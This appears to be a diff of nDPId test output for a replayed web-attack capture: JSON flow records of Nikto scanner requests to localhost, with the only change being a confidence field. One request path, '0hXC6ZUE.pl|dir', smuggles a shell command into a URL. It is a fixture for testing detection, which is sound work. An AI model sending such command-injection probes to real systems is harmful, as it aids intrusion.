00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276668,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1576420276668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276668,"pkt":"AAAAAAAAAAAAAAAACABFAADHxyBAAEAGdQ5\/AAABfwAAAcGUH5ATo\/8SaEXHToAYAED+uwAAAQEICp1m+uSdZvrkR0VUIC8waFhDNlpVRS5wbHxkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276668,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276668,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1576420276669,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276669,"pkt":"AAAAAAAAAAAAAAAACABFAADE5o1AAEAGVaR\/AAABfwAAAcGWH5C1696FBSsDZ4AYAED+uAAAAQEICp1m+uWdZvrlR0VUIC8waFhDNlpVRS50eHQgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276672,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1576420276672,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276672,"pkt":"AAAAAAAAAAAAAAAACABFAADEp8RAAEAGlG1\/AAABfwAAAcGYH5CQgZ\/Tf1wQGoAYAED+uAAAAQEICp1m+uidZvroR0VUIC8waFhDNlpVRS5pZGMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276672,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276672,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276673,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1576420276673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420276673,"pkt":"AAAAAAAAAAAAAAAACABFAADOZZhAAEAG1o9\/AAABfwAAAcGaH5DBdl2HfBCdbYAYAED+wgAAAQEICp1m+umdZvrpR0VUIC8waFhDNlpVRS5CQm9hcmRTZXJ2bGV0IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276673,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276673,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1576420276675,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276675,"pkt":"AAAAAAAAAAAAAAAACABFAADE9v9AAEAGRTJ\/AAABfwAAAcGcH5BsDc7u0ozjzoAYAED+uAAAAQEICp1m+uqdZvrqR0VUIC8waFhDNlpVRS5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276676,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1576420276676,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276676,"pkt":"AAAAAAAAAAAAAAAACABFAADHEPBAAEAGKz9\/AAABfwAAAcGeH5DFGykA4SBK+YAYAED+uwAAAQEICp1m+uydZvrsR0VUIC8waFhDNlpVRS4xMDoxMDAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276676,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276676,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1576420276677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276677,"pkt":"AAAAAAAAAAAAAAAACABFAADECABAAEAGNDJ\/AAABfwAAAcGgH5BVFT\/w+l\/OFYAYAED+uAAAAQEICp1m+u2dZvrtR0VUIC8waFhDNlpVRS5leGUgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1576420276678,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276678,"pkt":"AAAAAAAAAAAAAAAACABFAADFtjJAAEAGhf5\/AAABfwAAAcGiH5AIK44ii9cP6IAYAED+uQAAAQEICp1m+u6dZvruR0VUIC8waFhDNlpVRS5waHAzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 